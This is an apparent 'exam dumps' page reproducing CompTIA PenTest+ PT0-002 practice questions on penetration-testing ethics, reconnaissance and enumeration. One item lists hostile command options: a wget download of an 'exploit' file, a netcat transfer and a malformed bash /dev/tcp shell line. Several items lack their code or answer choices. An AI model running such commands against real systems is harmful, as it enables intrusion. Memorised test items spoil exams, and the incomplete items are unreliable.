New TestKingFree PT0-002 Exam Questions Real PT0-002 Dumps Updated on Aug 17, 2023 [Q62-Q79]

Rate this post

New TestKingFree PT0-002 Exam Questions| Real PT0-002 Dumps Updated on Aug 17, 2023

PT0-002 Braindumps – PT0-002 Questions to Get Better Grades

If you’re someone interested in pursuing a career in the field of cybersecurity, one of the certifications that you should consider getting is the CompTIA PT0-002 (CompTIA PenTest+) Certification Exam. PT0-002 examination is designed to measure your knowledge and understanding of penetration testing, and whether or not you have the skills necessary to perform them in a safe, ethical, and effective manner.

NO.62 A penetration tester is reviewing the following SOW prior to engaging with a client:
“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.” Based on the information in the SOW, which of the following behaviors would be considered unethical?
(Choose two.)

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

NO.63 Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

Exploit-DB

Metasploit

Shodan

Retina

NO.64 The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A vulnerability scan

A WHOIS lookup

A packet capture

An Nmap scan

NO.65 Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?

Scope details

Findings

Methodology

Statement of work

NO.66 A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

nc 10.10.51.50 9891 < exploit

powershell -exec bypass -f \10.10.51.509891

bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

wget 10.10.51.50:9891/exploit

NO.67 A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?

A device on the network has an IP address in the wrong subnet.

A multicast session was initiated using the wrong multicast group.

An ARP flooding attack is using the broadcast address to perform DDoS.

A device on the network has poisoned the ARP cache.

NO.68 A penetration tester obtained the following results after scanning a web server using the dirb utility:
…
GENERATED WORDS: 4612
—- Scanning URL: http://10.2.10.13/ —-
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
…
DOWNLOADED: 4612 – FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

index.html

about

info

home.html

NO.69 A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

Halt the penetration test.

Contact law enforcement.

Deconflict with the penetration tester.

Assume the alert is from the penetration test.

NO.70 The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a
“probable port scan” alert in the organization’s IDS?

Line 01

Line 02

Line 07

Line 08

NO.71 A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

VRFY and EXPN

VRFY and TURN

EXPN and TURN

RCPT TO and VRFY

NO.72 During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

NO.73 When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

NO.74 A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client’s building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A handheld RF spectrum analyzer

A mask and personal protective equipment

Caution tape for marking off insecure areas

A dedicated point of contact at the client

The paperwork documenting the engagement

Knowledge of the building’s normal business hours

NO.75 A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

Add a dependency checker into the tool chain.

Perform routine static and dynamic analysis of committed code.

Validate API security settings before deployment.

Perform fuzz testing of compiled binaries.

NO.76 A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

The reverse-engineering team may have a history of selling exploits to third parties.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

The reverse-engineering team will be given access to source code for analysis.

NO.77 A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.
3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.
Which of the following potential issues can the penetration tester identify based on this output?

At least one of the records is out of scope.

There is a duplicate MX record.

The NS record is not within the appropriate domain.

The SOA records outside the comptia.org domain.

NO.78 An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

Uncover potential criminal activity based on the evidence gathered.

Identify all the vulnerabilities in the environment.

Limit invasiveness based on scope.

Maintain confidentiality of the findings.

NO.79 In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

Test for RFC-defined protocol conformance.

Attempt to brute force authentication to the service.

Perform a reverse DNS query and match to the service banner.

Check for an open relay configuration.

CompTIA PT0-002 exam is intended for cybersecurity professionals who want to specialize in penetration testing. PT0-002 exam covers various topics, including network scanning and reconnaissance, web application testing, and wireless network testing. Additionally, candidates will learn about social engineering, exploit development, and reporting techniques.

PT0-002 Exam Dumps – Try Best PT0-002 Exam Questions: https://www.testkingfree.com/CompTIA/PT0-002-practice-exam-dumps.html